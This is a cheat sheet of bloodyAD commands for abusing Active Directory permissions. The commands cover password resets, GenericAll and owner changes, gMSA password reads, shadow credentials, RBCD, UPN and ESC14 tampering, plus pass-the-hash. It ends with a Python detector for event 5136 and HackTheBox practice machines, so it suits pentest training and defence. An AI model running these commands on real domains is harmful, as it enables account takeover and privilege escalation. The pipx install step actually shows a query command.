Installation
Using uv
```bash
uv tool install bloodyAD
```
Using pipx
```bash
bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username
```
Add User To Group
```bash
bloodyAD --host $dc -d $domain -u $username -p $password add groupMember $group_name $member_to_add
```
Change Password
```bash
bloodyAD --host $dc -d $domain -u $username -p $password set password $target_username $new_password
```
Give User GenericAll Rights
```bash
bloodyAD --host $dc -d $domain -u $username -p $password add genericAll $DN $target_username
```
WriteOwner
```bash
bloodyAD --host $dc -d $domain -u $username -p $password set owner $target_group $target_username
```
ReadGMSAPassword
```bash
bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username --attr msDS-ManagedPassword
```
Enable a Disabled Account
```bash
bloodyAD --host $dc -d $domain -u $username -p $password remove uac $target_username -f ACCOUNTDISABLE
```
Add The TRUSTED_TO_AUTH_FOR_DELEGATION Flag
```bash
bloodyAD --host $dc -d $domain -u $username -p $password add uac $target_username -f TRUSTED_TO_AUTH_FOR_DELEGATION
```
Modify UPN
```bash
bloodyAD --host $dc -d $domain -u $username -p $password set object $old_upn userPrincipalName -v $new_upn
```
Check if it has been modified
```bash
bloodyAD --host $dc -d $domain -u $username -p $password get object $target_user --attr userPrincipalName
```
MachineAccountQuota
Enumerate MachineAccountQuota
```bash
bloodyAD --host $dc -d $domain -u $username -p $password get object 'DC=dc,DC=dc' --attr ms-DS-MachineAccountQuota
```
Set MachineAccountQuota value to 10
```bash
bloodyAD --host $dc -d $domain -u $username -p $password set object 'DC=dc,DC=dc' ms-DS-MachineAccountQuota -v 10
```
Modify mail
```bash
bloodyAD --host $dc -d $domain -u $username -p $password set object $target_user mail -v newmail@test.local
```
Modify the altSecurityIdentities attribute (ESC14B)
```bash
bloodyAD --host $dc -d $domain -u $username -p $password set object $target_user altSecurityIdentities -v 'X509:<RFC822>user@test.local'
```
Find Writable Attributes
```bash
bloodyAD --host $dc -d $domain -u $username -p $password get writable --detail
```
Shadow Credentials
```bash
bloodyAD --host $dc -d $domain -u $username -p $password add shadowCredentials $target
```
WriteSPN
```bash
bloodyAD --host $dc -d $domain -u $username -p $password set object $target servicePrincipalName -v 'domain/meow'
```
Find Deleted Objects
```bash
bloodyAD --host $dc -d $domain -u $username -p $password get writable --include-del
```
Extended Search Operations
```bash
bloodyAD --host $dc -d $domain -u $username -p $password get search -h
```
e.g. `-c 1.2.840.113556.1.4.2064 -c 1.2.840.113556.1.4.2065` to display tombstoned

```bash
bloodyAD --host $dc -d $domain -u $username -p $password -k get search -c 1.2.840.113556.1.4.2064 -c 1.2.840.113556.1.4.2065
```
Restore a deleted object
```bash
bloodyAD --host $dc -d $domain -u $username -p $password -k set restore $user_to_restore
```
Create a new computer account
```bash
bloodyAD --host $dc -d $domain -u $username -p $password add computer $computer_name $computer_password
```
Add Resource Based Constrained Delegation
```bash
bloodyAD --host $dc -d $domain -u $username -p $password add rbcd 'DELEGATE_TO$' 'DELEGATE_FROM$'
```
Notes
- Pass `-k` to use Kerberos authentication
- You can pass a user hash instead of a password using `-p :hash`
- Specify the format for `--password` or `-k` using `-f`, e.g. `-f rc4`
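On the defending side, the attribute writes made by the commands above are recorded as Windows Security event 5136 when Directory Service Changes auditing and a matching SACL are in place. The following is an added example, not part of the original cheat sheet: it scans constructed JSON-lines events and flags writes to those attributes by accounts outside an allowlist. The export layout (one JSON object per line with the event's own field names), the account names and the allowlist are assumptions.

```python
import json

# LDAP attributes written by the commands on this page -> the section they map to.
WATCHED = {
    "userprincipalname": "Modify UPN",
    "mail": "Modify mail",
    "altsecurityidentities": "altSecurityIdentities (ESC14B)",
    "serviceprincipalname": "WriteSPN",
    "ms-ds-machineaccountquota": "MachineAccountQuota",
    "useraccountcontrol": "uac flags",
    "msds-keycredentiallink": "Shadow Credentials",
    "msds-allowedtoactonbehalfofotheridentity": "RBCD",
    "ntsecuritydescriptor": "GenericAll / WriteOwner",
}
VALUE_ADDED = "%%14674"  # OperationType "Value Added"; "%%14675" is "Value Deleted"

# Constructed sample events (not real logs); the export format is an assumption.
SAMPLE = """\
{"EventID": 5136, "SubjectUserName": "svc_backup", "ObjectDN": "CN=WEB01,CN=Computers,DC=test,DC=local", "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "%%14674"}
{"EventID": 5136, "SubjectUserName": "idm_sync", "ObjectDN": "CN=alice,CN=Users,DC=test,DC=local", "AttributeLDAPDisplayName": "mail", "OperationType": "%%14674"}
{"EventID": 5136, "SubjectUserName": "j.doe", "ObjectDN": "CN=bob,CN=Users,DC=test,DC=local", "AttributeLDAPDisplayName": "userPrincipalName", "OperationType": "%%14675"}
{"EventID": 5136, "SubjectUserName": "j.doe", "ObjectDN": "CN=bob,CN=Users,DC=test,DC=local", "AttributeLDAPDisplayName": "userPrincipalName", "OperationType": "%%14674"}
{"EventID": 4624, "SubjectUserName": "j.doe"}
not json at all
"""

def flag_changes(lines, allowed_writers=frozenset()):
    """Return (writer, object DN, page section) for each watched attribute write."""
    findings = []
    for line in lines.splitlines():
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # tolerate truncated or non-JSON lines in the export
        # A replace is logged as a delete plus an add; count only the add.
        if ev.get("EventID") != 5136 or ev.get("OperationType") != VALUE_ADDED:
            continue
        attr = str(ev.get("AttributeLDAPDisplayName", "")).lower()
        who = str(ev.get("SubjectUserName", ""))
        if attr in WATCHED and who.lower() not in allowed_writers:
            findings.append((who, ev.get("ObjectDN", ""), WATCHED[attr]))
    return findings

if __name__ == "__main__":
    for finding in flag_changes(SAMPLE, allowed_writers={"idm_sync"}):
        print(finding)
```

Password resets and group membership changes are better tracked through their dedicated events (4724 and the 4728/4732/4756 family) than through 5136.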
Resources
Machines To Practice
- Redelegate (Vulnlab)
- Vintage (HackTheBox)
- Infiltrator (HackTheBox)
- Rebound (HackTheBox)
- Absolute (HackTheBox)
- Certified (HackTheBox)
- TombWatcher (HackTheBox)
- Voleur (HackTheBox)